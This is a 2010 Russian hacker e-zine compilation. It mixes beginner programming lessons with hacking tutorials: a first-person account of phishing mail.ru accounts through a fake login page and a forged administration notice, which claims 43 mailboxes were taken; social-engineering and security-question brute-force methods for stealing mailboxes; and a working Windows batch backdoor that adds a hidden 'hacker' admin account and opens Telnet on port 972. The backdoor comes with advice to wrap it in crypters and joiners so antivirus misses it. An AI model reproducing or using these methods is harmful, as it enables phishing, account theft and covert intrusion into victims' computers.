В помощь юзеру

Эта страница использует фреймы. Поскольку Ваш браузер не может просматривать такие страницы, воспользуйтесь следующими ссылками:

Урок 1

Урок 2

Урок 3

Урок 4


 О программировании
Система регистрации на PHP
Создание счетчика посещений на Perl
Задача из легких
О взломе
Взлом мыла. Часть 1
Взлом мыла. Часть 2
Взлом через Telnet


Вся информация собранная в этом файле взята в открытых источниках интернета.

Составитель: P@u1io

Copyright © Fes-Corporation (SFXack) 2010


Интересный способ использования фейка@mail.ru

Автор: Restot
Чуть-чуть редакции: P@u1io

Общался я с девушкой одной, и как часто бывает, мы расстались, а она мне по сей день нравится. Ну и надумал я, взломать её мыло, и почитать письма. Конечно, я мог просто увести куки (cookie), и почитать малявы, но я решил сделать большее. А именно:

1. Скачал с HZ фейк mail.ru
2. Зарегил новый ящик
3. Нашел бесплатный хостинг с php, и закачал фейк.
4. Протестировал фейк на работоспособность.

Пройдем по порядку:
================================================

1. Ну, тут думаю все понятно, правда, фейк скачал я с сайта redbu11а
________
2. Идете на http://mail.ru/ и регистрируете новый аккаунт, и стараетесь много о себе не писать. Создаете что-то, типа [moi_mir@mail.ru], создаете и мир тоже, в поле имя вводите – Мой Мир - в поле фамилия - @Mail.Ru. Затем оставляете его.
________
3. Идете на http://freehostings.narod.ru/ и выбираете себе подходящий хостинг, регистрируетесь на свой только что созданный почтовый ящик, заливаете фейк вместе со скриптом через какой-нибудь FTP - клиент, например, FileZilla. Все, теперь осталось протестировать.
________
4. Последний шаг, тестирование. Заходим на сайт, и в поле "имя", вводим - vasya
в поле пароль - pupkin, (можно писать, что угодно (интересно, есть ли человек по имени Вася Пупкин? бедняга...)) нажимаем "войти". Затем заходим на сайт с помощью FTP - клиента, и скачиваем текстовый файл «LOG.txt», открываем его, и радуемся, наши пароли там))
Выше приведена теория, теперь мой личный опыт))
=====================================================

Значит так, сделал я все также, как расписал выше.
Все было готово. После этого, я зашел в свой мир, и в блоге написал следующее:

=====================================================
=====================================================
Здравствуйте!

В связи с перебоями в сети, часть данных с серверов, была утеряна. На настоящий момент, более
3.000 e-mail аккаунтов, не находятся в базе данных. Это означает, что если Ваш аккаунт находится в этом
списке, то все данные о Вас утеряны, и будут - УДАЛЕНЫ

Под данными, подразумевается следующее:
Список друзей;
Входящие и исходящие сообщения;
Все сайты, на которых вы зарегистрированы будут выдавать ошибку (ERROR 407, данный e-mail не действителен);
Фотографии и оценки за них;
И наконец, Вы лишитесь своего e-mail адреса, и возможно, не сможете вновь его зарегистрировать;

Чтобы предотвратить все перечисленное выше, мы советуем Вам перейти на специально заготовленный
сайт авторизации, и авторизоваться, чтобы ваши данные сохранились в БД. Мы искренне просим прощения,
за все что произошло, и стараемся предотвратить потерю данных.

С уважением, Администрация @MAIL.RU
=====================================================

Hello!

In connection with faults in a network, the part of the data from servers, has been lost. Currently, more than
3.000 e-mails of accounts, are not in a database. It means that if your account is in this list all data about you will be
lost, and in a consequence - are REMOVED

Under the data, the following is meant:
The list of friends;
Entering and outgoing messages;
Photos and estimations for them;
All sites on which you will be registered to give out an error (ERROR 407, the given e-mail is not valid);
And at last, you lose the e-mail of the address, and is possible, cannot register it again;

To prevent all listed above, we advise to you to pass to specially prepared site of authorisation, and to be
authorised, that your data has remained in a DB. We sincerely are sorry, for all that has occurred, and we try
to prevent loss of the data.

Yours faithfully, Administration @MAIL.RU
=====================================================
=====================================================

Заметьте, написано на 2 языках, потому что обычно все сайты присылают сообщения на двух языках. А ссылки на фейк, спрятаны в словах. Причем я поставил ссылки, и на сам mail.ru. Так вот, написал в блог, и сохранил. В строке названия написал "В целях собственной безопасности, читайте блог"
Теперь почти все было готово. После этого, я открыл исходный код, и переделал все как надо, чтобы было похоже на мир администрации. переделанное, заскриншотил. (Конечно, опытный поймет, ну а ЛаМеР - )))) и положил в альбом на Mail.ru. Затем, я пошел, и отправил sms, чтобы попасть в блок "Хочу общаться" на mail.ru. Стоит ~30 руб.
И ко мне потянулись люди. За пару минут, список гостей перевалил за 200, а друзей было 18...
Мне стали писать, с просьбами поставить им рамку "Звезда, гарантированно Mail.Ru", ну и т.п. фигней... Я подумал про себя "вот я дурак", оказалось и в правду дурак, раз посмел так подумать))
Люди шли в мой блог, и я был счастлив))) за 20 минут активных действий, я взломал 43 ящика))))не плохо?)))вот так то))
А помните мою цель? взломать только подругу, вот так, практически случайно, я и наткнулся на такой способ использования))
и еще одно, общайтесь с людьми вежливо, и на "ВЫ", даже если знаете, что они кретины)
вежливость - главное оружие хакера в сети, а вора - в жизни) но мы, хакеры))
Только обидно одно - более опытные юзеры, а то и хакеры, палят друг друга по страшному... нет, промолчать, раз понял, в чем дело... а они...эх...обидно..
====================================================
ссылки, на необходимый софт:

FileZilla (портативная версия) - http://depositfiles.com/files/iagwiqj3d

Фейк @mail.ru - http://depositfiles.com/files/vrkls47r0

А так же моя группа В Контакте: http://vkontakte.ru/club10303635

====================================================
Если у кого будут вопросы, стучитесь в ICQ: 777-09-74

Моск restot`a


В помошь юзеру

 Взлом мыла
Один из самых простых

Пишите владельцу мыла какое нить письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил. Если это какой нить "чудо-крутой хакер", то что нить типа: "Слушай, а ты в натуре можешь сайт сломать??? http://www.microsoft.com/ не твоя работа???" и так далее в этом духе...;-) Если Веб-мастер, то что нить типа: "Мне так нравится как ты пишешь! А у тебя JAVA-скрипта нету, что б он там что то делал???"...По фигу ЧТО, главное что б от него назад ответ пришел. В принципе эта вся процедура была только для того, что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место расположения "клиента". То бишь если по ентому мылу находится аська, то смотрим инфу в аське, город (если не прописан в аське, то по ИП), имя, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной системы есть админ, и у 99% www-шные сервера), обычно это адреса admin@provider.com и support@provider.com. Так вот... Пишешь письмо (очень желательно через www-браузер, например от www.mail.ru или www.hotmail.com) и через анонимную проксю. Это для того что б в заголовке пакета был ИП прокси. Так.... для секьюрити... ;-) Так вот. В теле письма пишешь, что так и так... Злобные хакеры украли у тебя мыло, а тебе очень нравится их служба, сервис, скорость работы, безглючность и все такое... Что ты никогда не променяешь ихний сервис, и что они вообще самые крутые мыльщики! Указываешь ИМЯ, ФАМИЛИЮ, ЗИП, ГОРОД, Телефон (от балды) или что они там еще просят.... Ессено назад придет письмо, что "Информация не совпадает с введенной при регистрации и все такое...". Но ты будь настойчивей! Пиши назад, что ТО_ЧТО_ТЫ_ИМ_ВЫДАЕШЬ - ЕДИНСТВЕННАЯ ВЕРНАЯ ИНФОРМАЦИЯ о ТВОЕМ аккаунте! И повторяешь им ту же инфу, что и первый раз. И так пока админ не сломится...но не забывай каждый раз расхваливать их сервис! ;-) Обычно раз на 7-10 прокатывает... ;-) У меня был даже раз случай, когда один буржуйский админ "отдал" мне мыло, где (как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала той что я ему ВЫДАВАЛ якобы за владельца аккаунта! Так что дерзайте, тут главное БОЛЬШЕ фантазии и упорства! Но и о безопасности не забывайте!

Второй способ

Посложнее, но все равно общедоступный. Почти в каждом мыльном сервисе есть служба что типа "Foggot Password?" Так вот...Заходим туды (предварительно не забыв изменить атрибуты филе cookie_для_этой_службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы... Если повезет , то вопрос будет (к примеру на мыло.ру) "В каком городе ты родился"? В первом способе описано как узнавать город юзверя по мылу , так что на этом не бум останавливаться .Ну и вопросы бывают "кустомайзские"- типа "2000" , ответ обычно такойже..;-) А вот если что нить типа "Как зовут мою собаку?" , то читай ниже... Открываем эту страницу (ну где вводить надо ответ на секретный вопрос , не догоняешь что ль???;-)) итам в HTML-просмотре ищем строчкутипа : form action="/cgi-bin/3970.dll?secquest" итд... Так вот... Если урл мыла http://www.mail.ru , то полный урл места куда отправляется"секретный ответ" будет http://www.mail.ru/cgi-bin/3970.dll?secquest. Этот урл вводишь вместе с индефикатором Вопроса в программу типа WWWHack. Идентификатор вопроса находится там же где и form action="/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту программу или загружаешь встроенный wordlist c паролями или пишешь свой по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и ждешь... Так что тут тоже нужно терпение и хоть базовые знания HTML.


Создание счетчика посещений на Perl.

Автор: неизвестен
Редактор: Кирилл Шагин

Что ж, сегодня мы научимся создавать простейшие счётчики для личных Web-страниц. Так как этот вопрос не раз задавался в этом журнале. Конечно, все ниже описанное ни коим образом не посягает на идеал, хотя бы потому, что это один из первых моих счётчиков, а может потому, что мне пока 16... не знаю, но знаю точно, что это работает!

Итак, начнём.

Разберёмся, какие действия должен выполнять наш счётчик:
  1. считать общее количество посетителей
  2. считать число уникальных посетителей за день

    Теперь обозначим, где будут хранится данные. Я думаю, что удобнее всего их хранить в текстовых файлах, причём таковых будет два: в первом будет храниться вся статистика (т.е. и хиты и хосты). А второй текстовый файл нам очень пригодиться для хранения базы IP. Когда посетитель будет заходить на нашу страничку впервые, то его IP занесётся в базу (чтобы его впредь больше не считать уникальным), в текстовом файле произойдут изменения: увеличатся значения хитов и хостов на 1. Теперь, допустим, тот же человек, с тем же IP заходит повторно к нам на страницу.

    Перед тем, как увеличить статистику, следует порыскать в нашей базе, и если такого IP за этот день там нет, значит можно спокойно конкатенировать и то и другое, если же есть, то увеличиваем только хиты. Следует заметить, что в базе IP, кроме самих IP будут храниться дни посещения. И если любой пользователь зайдёт на сайт, допустим, через неделю, и он был единственным за это время то, следовательно база устарела и в результате из неё будут вычищены прошлые данные.

    Вот собственно код:

    Как встроить счётчик
    Для работы счётчика достаточно иметь любой сервер с поддержкой Perl и SSI. С помощью второго мы можем вставить наш счётчик в любое место страницы вот так:
    <!--#exec cgi="counter1.pl"-->
    для скрипта права 755 для текстовых файлов 666

    Ну... вот вроде бы и всё :) Для новичков, возможно, сложно, но я сам полторы недели как новичок... был. На самом деле главное понять принцип, вы и сами сможете написать что-то подобное или даже лучшее, никто вас не ограничивает. Меня ограничил лишь световой день. Perl советую всем! Он не лёгок, но две недели практики в писании скриптов вам окупятся! Удачи!


Система регистрации на PHP

Автор: Алексей Макаров

Итак, нам нужно создать две папки: templates (здесь будут хранится шаблоны) и users (здесь будут файлы пользователей).
Создаем в корневой директории файл reg.htm и пишем в него следующее:

Это простейшая HTML-форма и думаю, что в комментариях не нуждается.
Теперь создаем файл reg.php:

Делаем config.php:

Далее - login.htm:

И login.php:

И наконец...пишем файл вывода информации о пользователе:

А в папку templates кидаем файл nouser.htm - шаблон вывода ошибки. Вот и все. Enjoy;)


Взлом через TELNET

Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать, давайте узнаем, что за такая служба телнет.

Телнет - сетевой протокол для работы в удаленной системе в терминальном режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.

Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у
жертвы. Бывает такое, что этот сервис уже будет весить у "врага", но при попытки
подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,
но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким
методом как социальная инженерия(СИ). Я думаю не надо объяснять, что это такое.
Если вы думаете, что СИ никак не относится, к хакерству то вы ошибаетесь, этот
метод в данном случае наиболее актуален.
Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый
тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе
порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто
написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной строки).
тело батника:

chcp 1251 net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

все это пишешь в блокноте, и сохраняем как *.bat

Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add - не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start= auto которая
меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это
палевно, поэтому советую прописывать этой командой tlntadmn config port=972
sec=-NTLM , редко используемый порт. В нашем случае это 972.
Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet окончательно запустит наш бэкдор.

теперь проверим правильный ли синтаксис кода. Открываем командную строку, если
она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,
запускаем и смотрим, нет ли ошибок. Убедится что все ок, еще можно так:
Пуск -> Выполнить -> пишем services.msc -> Ok
Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и
смотришь её свойства. При необходимости в любой момент можно её отключить.

Вот батник готов, и как ты видишь он слишком палевный, при его запуске вылетает
консольное черное окно, говорящее о выполняемых процессах в командной строке. Но
не все так плохо, тебе поможет такая программа, как QuickBatchFileCompiler http://ifolder.ru/7197807. Она
компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник
превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.
Вроде готово... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому
бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно
скачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872
RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменить
сигнатуру дабы не палится антивирусами.
Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы
тебе осталось только подключится к телнету через указанный тобой порт. Бывает
так что жертва находится в глобальной сети www у которой IP динамический, в этом
случаи, зная диапазон IP его провайдера можно просканировать эту сеть на
открытый наш редко используемый 972 Порт. А чтобы знать когда твой "друг"
в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.
Осталось подключиться. Для этого можешь выбрать стандартный виндосовский
клиент, который находится тут c:WINDOWS/system32/telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё окей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>_

Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять компом, отдавая команды...
Можно, к примеру, расшарить диски:

C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul

перезагрузить комп:
C:>shutdown -r -t 1 -c -f

прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему

или поднять ftp сервер и залить радмина для более удобного удаленного администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)

Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.

P.S. На все непонятные термины и выражения есть Гугл.

Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь
попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей
информационной безопасности

GivioN


Задача из легких

Автор: Virpool

Сейчас много изучающих программирование, особенно среди школьников, осознавших, что компьютер — это не только игрушки, но и мощный аппарат для написания полезных программ. Обычное дело, когда на форумах начинающие программисты обращаются к более продвинутым «кодерам» с просьбой что-либо разъяснить. Или берутся самостоятельно изучать разные учебники. Но теория теорией, а практика все-таки не помешает.

Предлагаю подборку задач, решая которые, можно научиться много чему полезному в программировании (не говорю уже об элементарном расширении кругозора). Если вы крутой кодер, которому моря по колено, возможно, эти задачи покажутся вам примитивными. Но если вы сомневаетесь в своих силах, то предлагаю прочесть эту статью и сделать соответствующие выводы.

Недавно передо мной встала одна проблема: как упорядочить текст (слова) в переменной типа string по алфавиту? Как бы и не особая проблема, но оказалось, для кого как. Особенно для начинающих программистов. Поэтому вот такая обрисовалась задача.

Задача №1:

Дана строка, в которой находятся, допустим, пять слов (количество несущественно, хоть миллион), разделенных пробелом. Задача состоит в том, чтобы упорядочить слова по алфавиту средствами Паскаля (Object Pascal).

Решение:

Эту задачу можно решить многими способами, но лучше всего создать массив из этих слов, отсортировать, а затем вывести полученный массив на экран. Для решения этой задачи будем использовать среду разработки Delphi 7.

Поначалу нужно написать подпрограмму для преобразования строки из слов в массив. Допустим, мы напишем процедуру. У меня получилось такое:

Далее нужно отсортировать этот массив любым из известных вам методов. Не мудрствуя лукаво, используем самый простой. В итоге у нас получится что-то вроде этого:

В принципе, наша задача решена. Но благо мы пишем на Delphi, создадим еще одну подпрограмму вывода массива, например, в компонент Memo. Тогда в нашу программу добавится еще одна процедура:

И еще… Чтобы уже наверняка разобраться с задачей :-), представим, что все эти действия будут происходить при нажатии на кнопку Button1:

Вместо эпилога

В ходе решения задачи мы затронули некоторые аспекты программирования, такие как работа со строками, массивами. Надеюсь, время, которое ушло на прочтение данного материала (и, смею надеяться, его реализации), не потрачено вами даром.

Эту задачу можно было решить и без использования массива: берем две подстроки, в нашем случае два слова, заносим их в две разных переменных, а затем попарно их сравниваем и сортируем. Но этот метод (ИМХО) не очень рационален, есть множество других вариантов, получше.

И главное — в строке может быть сколь угодно много слов. Для того чтобы увеличить число обрабатываемых слов, нужно просто увеличить значение константы Count. Например, с пяти до ста, или более. Собственно, это и будет вашим заданием. Подсказка: можно объявить динамический массив, в процедуре StringToArray узнать количество слов, в соответствии с ним установить размерность массива (при помощи стандартной подпрограммы SetLenght), а потом уже его заполнить. Это задание очень легкое, поэтому оставляю вас с ним наедине.

P.S. Если у вас получилось решение лучше и компактнее, чем у меня, прошу поделиться. Удачи вам в ваших начинаниях… и, собственно, продолжениях :-).

Источник: http://mycomp.com.ua